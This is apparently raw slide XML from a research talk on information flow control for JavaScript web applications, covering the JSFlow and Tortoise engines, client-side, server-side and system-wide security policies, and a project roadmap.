          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4264266" y="1872402"/>
            <a:ext cx="0" cy="43041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Bildobjekt 35" descr="preview-mobile-application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16" t="12043" r="29560" b="57033"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2652688" y="3562899"/>
            <a:ext cx="680851" cy="636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1" name="Frihandsfigur 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1670811" y="3045260"/>
            <a:ext cx="5643637" cy="1156989"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5643637"/>
              <a:gd name="connsiteY0" fmla="*/ 344189 h 1156989"/>
              <a:gd name="connsiteX1" fmla="*/ 1148080 w 5643637"/>
              <a:gd name="connsiteY1" fmla="*/ 811549 h 1156989"/>
              <a:gd name="connsiteX2" fmla="*/ 3271520 w 5643637"/>
              <a:gd name="connsiteY2" fmla="*/ 852189 h 1156989"/>
              <a:gd name="connsiteX3" fmla="*/ 5466080 w 5643637"/>
              <a:gd name="connsiteY3" fmla="*/ 8909 h 1156989"/>
              <a:gd name="connsiteX4" fmla="*/ 5262880 w 5643637"/>
              <a:gd name="connsiteY4" fmla="*/ 445789 h 1156989"/>
              <a:gd name="connsiteX5" fmla="*/ 3281680 w 5643637"/>
              <a:gd name="connsiteY5" fmla="*/ 1024909 h 1156989"/>
              <a:gd name="connsiteX6" fmla="*/ 1259840 w 5643637"/>
              <a:gd name="connsiteY6" fmla="*/ 974109 h 1156989"/>
              <a:gd name="connsiteX7" fmla="*/ 10160 w 5643637"/>
              <a:gd name="connsiteY7" fmla="*/ 1156989 h 115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43637" h="1156989">
                <a:moveTo>
                  <a:pt x="0" y="344189"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="301413" y="535535"/>
                  <a:pt x="602827" y="726882"/>
                  <a:pt x="1148080" y="811549"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1693333" y="896216"/>
                  <a:pt x="2551853" y="985962"/>
                  <a:pt x="3271520" y="852189"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3991187" y="718416"/>
                  <a:pt x="5134187" y="76642"/>
                  <a:pt x="5466080" y="8909"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5797973" y="-58824"/>
                  <a:pt x="5626947" y="276456"/>
                  <a:pt x="5262880" y="445789"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4898813" y="615122"/>
                  <a:pt x="3948853" y="936856"/>
                  <a:pt x="3281680" y="1024909"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2614507" y="1112962"/>
                  <a:pt x="1805093" y="952096"/>
                  <a:pt x="1259840" y="974109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="714587" y="996122"/>
                  <a:pt x="10160" y="1156989"/>
                  <a:pt x="10160" y="1156989"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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ihandsfigur 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1670811" y="2271849"/>
            <a:ext cx="4358640" cy="1605134"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4358640"/>
              <a:gd name="connsiteY0" fmla="*/ 975360 h 1605134"/>
              <a:gd name="connsiteX1" fmla="*/ 1290320 w 4358640"/>
              <a:gd name="connsiteY1" fmla="*/ 1493520 h 1605134"/>
              <a:gd name="connsiteX2" fmla="*/ 3291840 w 4358640"/>
              <a:gd name="connsiteY2" fmla="*/ 1463040 h 1605134"/>
              <a:gd name="connsiteX3" fmla="*/ 4358640 w 4358640"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1605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8640" h="1605134">
                <a:moveTo>
                  <a:pt x="0" y="975360"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="370840" y="1193800"/>
                  <a:pt x="741680" y="1412240"/>
                  <a:pt x="1290320" y="1493520"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1838960" y="1574800"/>
                  <a:pt x="2780453" y="1711960"/>
                  <a:pt x="3291840" y="1463040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3803227" y="1214120"/>
                  <a:pt x="4080933" y="607060"/>
                  <a:pt x="4358640" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Bildobjekt 26" descr="imgres.jp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46" y="4084719"/>
            <a:ext cx="502123" cy="50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Bildobjekt 27" descr="search.png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46" y="3058899"/>
            <a:ext cx="504000" cy="50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Bildobjekt 28" descr="images.jpg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889" b="89778" l="0" r="100000">
                        <a14:foregroundMark x1="61333" y1="40000" x2="61333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254" y="4423828"/>
            <a:ext cx="853661" cy="853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textruta 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230919" y="1827481"/>
            <a:ext cx="3826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IFC across the client-server boundary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507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57200" y="1786316"/>
            <a:ext cx="8229600" cy="2537111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Solution: provide information flow control on the server side in addition to on the client side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tie the classifications of the both sides together</a:t>
            </a:r>
          </a:p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Policies connected to user authentication, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g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information belonging to user A may only be sent in a reply to a request that is authenticated as A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user credentials may only be sent to the login service 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Systemwide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> end-to-end security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Bildobjekt 3" descr="imgres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388" y="5517665"/>
            <a:ext cx="800354" cy="80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Bildobjekt 4" descr="Cloud-Hosting-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484" y="4807535"/>
            <a:ext cx="831354" cy="831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Rak pil 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3547305" y="5897850"/>
            <a:ext cx="94311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Rak pil 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5456742" y="5381224"/>
            <a:ext cx="1144010" cy="35787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Rak pil 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1778796" y="5313148"/>
            <a:ext cx="860882" cy="4259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Rak pil 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1778796" y="6006694"/>
            <a:ext cx="860882" cy="2686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Bildobjekt 11" descr="preview-mobile-application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16" t="12043" r="29560" b="57033"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711087" y="5545137"/>
            <a:ext cx="680851" cy="636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Frihandsfigur 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1729210" y="5027498"/>
            <a:ext cx="5643637" cy="1156989"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5643637"/>
              <a:gd name="connsiteY0" fmla="*/ 344189 h 1156989"/>
              <a:gd name="connsiteX1" fmla="*/ 1148080 w 5643637"/>
              <a:gd name="connsiteY1" fmla="*/ 811549 h 1156989"/>
              <a:gd name="connsiteX2" fmla="*/ 3271520 w 5643637"/>
              <a:gd name="connsiteY2" fmla="*/ 852189 h 1156989"/>
              <a:gd name="connsiteX3" fmla="*/ 5466080 w 5643637"/>
              <a:gd name="connsiteY3" fmla="*/ 8909 h 1156989"/>
              <a:gd name="connsiteX4" fmla="*/ 5262880 w 5643637"/>
              <a:gd name="connsiteY4" fmla="*/ 445789 h 1156989"/>
              <a:gd name="connsiteX5" fmla="*/ 3281680 w 5643637"/>
              <a:gd name="connsiteY5" fmla="*/ 1024909 h 1156989"/>
              <a:gd name="connsiteX6" fmla="*/ 1259840 w 5643637"/>
              <a:gd name="connsiteY6" fmla="*/ 974109 h 1156989"/>
              <a:gd name="connsiteX7" fmla="*/ 10160 w 5643637"/>
              <a:gd name="connsiteY7" fmla="*/ 1156989 h 115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43637" h="1156989">
                <a:moveTo>
                  <a:pt x="0" y="344189"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="301413" y="535535"/>
                  <a:pt x="602827" y="726882"/>
                  <a:pt x="1148080" y="811549"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1693333" y="896216"/>
                  <a:pt x="2551853" y="985962"/>
                  <a:pt x="3271520" y="852189"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3991187" y="718416"/>
                  <a:pt x="5134187" y="76642"/>
                  <a:pt x="5466080" y="8909"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5797973" y="-58824"/>
                  <a:pt x="5626947" y="276456"/>
                  <a:pt x="5262880" y="445789"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4898813" y="615122"/>
                  <a:pt x="3948853" y="936856"/>
                  <a:pt x="3281680" y="1024909"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2614507" y="1112962"/>
                  <a:pt x="1805093" y="952096"/>
                  <a:pt x="1259840" y="974109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="714587" y="996122"/>
                  <a:pt x="10160" y="1156989"/>
                  <a:pt x="10160" y="1156989"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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ihandsfigur 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1729210" y="4254087"/>
            <a:ext cx="4358640" cy="1605134"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4358640"/>
              <a:gd name="connsiteY0" fmla="*/ 975360 h 1605134"/>
              <a:gd name="connsiteX1" fmla="*/ 1290320 w 4358640"/>
              <a:gd name="connsiteY1" fmla="*/ 1493520 h 1605134"/>
              <a:gd name="connsiteX2" fmla="*/ 3291840 w 4358640"/>
              <a:gd name="connsiteY2" fmla="*/ 1463040 h 1605134"/>
              <a:gd name="connsiteX3" fmla="*/ 4358640 w 4358640"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1605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8640" h="1605134">
                <a:moveTo>
                  <a:pt x="0" y="975360"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="370840" y="1193800"/>
                  <a:pt x="741680" y="1412240"/>
                  <a:pt x="1290320" y="1493520"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1838960" y="1574800"/>
                  <a:pt x="2780453" y="1711960"/>
                  <a:pt x="3291840" y="1463040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3803227" y="1214120"/>
                  <a:pt x="4080933" y="607060"/>
                  <a:pt x="4358640" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Bildobjekt 14" descr="Dialog-stop_icon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562" y="4599847"/>
            <a:ext cx="561288" cy="561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Bildobjekt 15" descr="Dialog-stop_icon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562" y="5802370"/>
            <a:ext cx="561288" cy="561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Rundad rektangulär 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6521786" y="4367098"/>
            <a:ext cx="1372172" cy="591791"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69702"/>
              <a:gd name="adj2" fmla="val 3159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Not /login</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rundad rektangulär 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2256727" y="4770190"/>
            <a:ext cx="2270421" cy="774947"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44578"/>
              <a:gd name="adj2" fmla="val 7530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 not authenticated as A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Bildobjekt 18" descr="imgres.jp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76" y="6066257"/>
            <a:ext cx="502123" cy="50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Bildobjekt 19" descr="search.png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76" y="4958889"/>
            <a:ext cx="504000" cy="50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094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80999" y="1719071"/>
            <a:ext cx="8407893" cy="499200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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSFlow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is written in JavaScript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Allows for various methods of deployment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As an extension – Tortoise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As a library, or in-lined in different ways [cite]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As a command-line interpreter running on-top of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Node.js</a:t>
            </a:r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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Node.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a popular and growing platform for web apps and web services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u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sed in those lectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>express.js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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passport.js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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>handlebars.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill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can be easily deployed in the cloud, e.g., on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heroku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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSFlow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can in principle be used to run those web apps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API wrapping needed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work in progress</a:t>
            </a:r>
          </a:p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When done – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSFlow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (or similar security aware engines) be used to provide client side security, server side security and system wide security</a:t>
            </a:r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Systemwide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> security and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>JSFlow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741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80999" y="1719071"/>
            <a:ext cx="8407893" cy="495409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Policy specification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How do we specify policies? Policy language?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Three types of policies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client side policies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server side policies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tying them together – system-wide policies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Policy provision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Who provides the policies? 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service provider? Requires user trust in the server.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user? Policies require system knowledge.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Both? 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Hard problem that requires more research and experimentation.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we didn’t talk about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936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86988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Union of policies from user and server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neither user nor server can prevent the other from providing potentially bad policies</a:t>
            </a:r>
          </a:p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Intersection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user would have to agree with server on policies</a:t>
            </a:r>
          </a:p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Each controls its own information – notion of ownership and authority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decentralized label model [Myers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Liskov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SOSP’97]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in the web setting [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Magazinius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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Askarov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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sabelfeld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AsiaCCS’10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]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wide policies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67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80999" y="1719071"/>
            <a:ext cx="8407893" cy="485339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We are actively developing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and Tortoise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Story so far</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="70866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Dynamic IFC for core of JavaScript </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="70866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Dynamic IFC for full JavaScript (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsflow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</a:p>
          <a:p>
            <a:pPr marL="70866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Hybrid IFC for core of JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="70866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Hybrid IFC for full JavaScript (ongoing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/hybrid)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On the road map	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Integrity tracking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Practical experiments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Feel free to follow us on http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.jsflow.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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Contact us if you’d like to help out or have an interesting project involving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Tortoise, or …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… if you find bugs or flaws! :D</a:t>
            </a:r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future of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jsflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/tortoise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932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937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80999" y="1719071"/>
            <a:ext cx="8407893" cy="486209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Key enabler: web 2.0 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Web 1.0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Static – entire page loaded each interaction with server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Stored or generated pages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JavaScript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provides dynamism – allows for reconstructing the page based on fetched data</a:t>
            </a:r>
          </a:p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Ajax – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XMLHttpRequest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asynchronous communication – allows for fetching and sending data without reloading the entire page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HTML5/CSS3 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enables more proper looking user interfaces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Browser as execution platform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provides platform independence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Together, this provides a solid foundation for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SaaS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Enabling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38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ktangel 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5142040" y="2483234"/>
            <a:ext cx="3841907" cy="500729"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent3">
                  <a:alpha val="48000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent3">
                  <a:shade val="100000"/>
                  <a:alpha val="48000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent3">
                  <a:shade val="85000"/>
                  <a:alpha val="48000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
            </a:path>
            <a:tileRect/>
          </a:gradFill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latshållare för innehåll 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451954" y="1813536"/>
            <a:ext cx="4038600" cy="4736135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Simplicity, availability and collaboration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u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>se or connect to 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> like, twitter, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gplus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> +1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dropbox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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> drive for storage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User created content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served to other users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Resources fetched from both 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parties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images, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>css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r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, data …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via 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party servers, 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party servers or CDNs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Asynchronous communication with 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parties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send and retrieve data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ads, analytics, …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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of web applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
